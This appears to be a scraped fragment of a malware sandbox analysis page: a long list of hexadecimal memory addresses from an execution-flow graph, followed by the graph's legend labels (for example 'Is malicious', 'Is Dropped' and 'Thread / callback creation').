0x004efe8b
0x004efe90
0x004efe97
0x004efeb2
0x004efeb2
0x004efebd
0x004efec5
0x004efec9
0x004efed7
0x004efedc
0x004efee6
0x004efeeb
0x004efefa
0x004eff01
0x004f04b1
0x004f04b1
0x004f04b9
0x004f04be
0x004f04c5
0x004f053a
0x004f053a
0x004f0544
0x004f0549
0x004f0554
0x004f055e
0x004f0573
0x004f057f
0x004f057f
0x004f0584
0x004f058c
0x004f058f
0x004f0597
0x00000000
0x00000000
0x00000000
0x00000000
0x004f04c7
0x004f04c7
0x004f04c7
0x004f04ca
0x004f04cf
0x004f04d4
0x004f04de
0x004f04e3
0x004f04e8
0x004f04ee
0x004f0511
0x004f0513
0x004f051a
0x00000000
0x00000000
0x00000000
0x00000000
0x004f051c
0x004f051c
0x004f051c
0x004f051f
0x004f0529
0x004f052e
0x00000000
0x004f051c
0x004f04f2
0x004f04f5
0x004f0503
0x004f0508
0x004f050b
0x00000000
0x004f0534
0x004f0534
0x00000000
0x004f04c7
0x004eff09
0x004eff0c
0x004eff10
0x004eff12
0x004eff15
0x004eff1a
0x004eff1f
0x004eff24
0x004eff25
0x004eff2b
0x004eff31
0x004eff3b
0x004eff3b
0x004eff48
0x004eff4d
0x004eff52
0x004eff57
0x004eff5d
0x004eff62
0x004eff65
0x004eff70
0x004eff75
0x004eff7d
0x004eff7d
0x004eff82
0x004eff87
0x004eff8c
0x004eff91
0x004effa1
0x004effb0
0x004effc3
0x004effca
0x004effd1
0x004f0016
0x004f001d
0x004f0022
0x004f002c
0x004f0031
0x004f0039
0x004f003e
0x004f0043
0x004f0048
0x004f004d
0x004f0052
0x004f0057
0x004f005d
0x004f0071
0x004f0076
0x004f0076
0x004f007c
0x004f005f
0x004f006a
0x004f006a
0x004f0084
0x004f0085
0x004f008e
0x004f0098
0x004f00ab
0x004f00be
0x004f00c9
0x004f00d2
0x004f00d5
0x004f00da
0x004f00df
0x004f00e4
0x004f00e9
0x004f00f1
0x004f0104
0x004f0109
0x004f0111
0x004f011b
0x004f011e
0x004f0129
0x004f012e
0x004f0138
0x004f013d
0x004f0142
0x004f0147
0x004f014c
0x004f0152
0x004f0154
0x004f0159
0x004f015e
0x004f0163
0x004f0169
0x004f017d
0x004f0182
0x004f0183
0x004f018c
0x004f0196
0x004f016b
0x004f016b
0x004f0176
0x004f0176
0x004f0169
0x004f019b
0x004f01a5
0x004f01b5
0x004f01c8
0x004f01cd
0x004f01d2
0x004f01d9
0x004f01dc
0x004f01e2
0x004f01e8
0x004f01ec
0x004f01fa
0x004f0206
0x004f020b
0x004f020e
0x004f020e
0x004f0214
0x004f0219
0x004f021d
0x004f022b
0x004f0230
0x004f023b
0x004f0240
0x004f024b
0x004f0250
0x004f0255
0x004f025f
0x004f0264
0x004f026d
0x004f0272
0x004f0278
0x004f027f
0x004f0284
0x004f0289
0x004f0293
0x004f0298
0x004f029d
0x004f02a2
0x004f02a7
0x004f02ad
0x004f02af
0x004f02b4
0x004f02b8
0x004f02be
0x004f02c8
0x004f02c8
0x004f02d8
0x004f02dd
0x004f02eb
0x004f02f0
0x004f02f5
0x004f02fa
0x004f030a
0x004f030c
0x004f0316
0x004f0316
0x004f031f
0x00000000
0x004f0325
0x004f0325
0x004f032a
0x004f0335
0x004f033b
0x004f033e
0x004f0346
0x004f0360
0x004f0368
0x004f0368
0x004f037b
0x004f0386
0x004f0389
0x004f0394
0x004f0399
0x004f03a1
0x004f03a4
0x004f03ac
0x004f03b4
0x004f03b7
0x004f03bc
0x004f03cb
0x004f03d3
0x004f03d7
0x004f03dd
0x004f03e7
0x004f03e7
0x004f03ef
0x004f03f6
0x004f03fb
0x004f040e
0x004f0415
0x004f0418
0x004f0418
0x004f041b
0x004f0423
0x004f0426
0x004f042a
0x004f0487
0x004f0487
0x004f0492
0x004f0497
0x004f049f
0x004f04a4
0x004f04ac
0x00000000
0x00000000
0x00000000
0x00000000
0x004f042c
0x004f042c
0x004f042c
0x004f043a
0x004f0442
0x004f0449
0x004f044e
0x004f0455
0x004f045c
0x00000000
0x00000000
0x00000000
0x00000000
0x004f045e
0x004f045e
0x004f045e
0x004f0461
0x004f0466
0x004f046b
0x004f0471
0x004f0471
0x004f047c
0x004f0481
0x00000000
0x004f042c
0x004effd3
0x004effd3
0x004effd3
0x004effd3
0x004effd3
0x004effd6
0x004effe0
0x004effe5
0x004f0005
0x004f000d
0x004effe7
0x004effea
0x004effee
0x004efff4
0x004efffe
0x004efffe
0x004f0010
0x00000000
0x004effd3
0x004efe99
0x004efe99
0x004efe99
0x004efe9c
0x004efea7
0x004efeac
0x004efeac
0x00000000
0x004efe99
0x004ef9aa
0x004ef9aa
0x004ef9aa
0x004ef9af
0x004ef9b6
0x004ef9b8
0x004ef9c3
0x004ef9c3
0x004ef9d2
0x004ef9d9
0x004ef9db
0x004ef9db
0x004ef9de
0x004ef9e9
0x004ef9ee
0x004ef9db
0x004ef9f4
0x004ef9f9
0x004ef9fe
0x004ef9fe
0x00000000
0x004ef9aa
0x004ef9a8
0x004ef37c
0x004ef383
0x004ef40e
0x004ef40e
0x004ef418
0x004ef41d
0x004ef422
0x004ef427
0x004ef432
0x00000000
0x00000000
0x00000000
0x00000000
0x004ef389
0x004ef389
0x004ef389
0x004ef38f
0x004ef396
0x004ef3a0
0x004ef3a0
0x004ef3aa
0x004ef3d5
0x004ef3d5
0x004ef3df
0x004ef3ac
0x004ef3ba
0x004ef3c5
0x004ef3d0
0x004ef3d0
0x004ef3f2
0x004ef3f7
0x004ef3ff
0x004ef404
0x00000000
0x004ef27c
0x004ef27c
0x004ef27c
0x004ef28c
0x004ef291
0x004ef294
0x004ef2b9
0x004ef2b9
0x004ef2bc
0x004ef296
0x004ef296
0x004ef29b
0x004ef29c
0x004ef2a5
0x004ef2af
0x004ef2af
0x004ef2bf
0x004ef2ca
0x004ef2cf
0x004ef2cf
0x00000000
0x004ef27c
0x004ef27a
0x00000000
0x00000000
0x00000000
0x004ef007
0x004ef007
0x004ef007
0x004ef018
0x004ef01d
0x004ef023
0x00000000
0x004eed91
0x004eed91
0x004eed91
0x004eed97
0x004eed9e
0x004eeda8
0x004eeda8
0x004eedaf
0x004eedb1
0x004eedb6
0x004eedb6
0x004eedbb
0x004eedc0
0x004eedc7
0x004eedce
0x004eedd0
0x004eedd0
0x004eedda
0x004eeddd
0x004eedd0
0x004eede3
0x004eeded
0x004eedf2
0x00000000
0x004eed91
0x004eed8f
0x004eeb44
0x004eea9a
0x004eea9f
0x004eeaa4
0x004eeaa9
0x004eeaae
0x004eeab6
0x004eeab9
0x004eeac1
0x004eeac6
0x004eead0
0x004eead5
0x004eeada
0x004eeae0
0x00000000
0x00000000
0x004eeae4
0x004eeaeb
0x00000000
0x00000000
0x00000000
0x00000000
0x004eeaed
0x004eeaed
0x004eeaed
0x004eeaf0
0x004eeaf5
0x004eeafa
0x00000000
0x00000000
0x00000000
0x00000000
0x004ee9a1
0x004ee9a1
0x004ee9a1
0x004ee9a9
0x004ee9be
0x004ee9c8
0x004ee9c8
0x004ee9cb
0x004ee9d0
0x004ee9d5
0x004ee9dd
0x004ee9e2
0x004ee9ed
0x004ee9f2
0x004ee9fd
0x004eea02
0x00000000
Play interactive tour
Edit tour
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node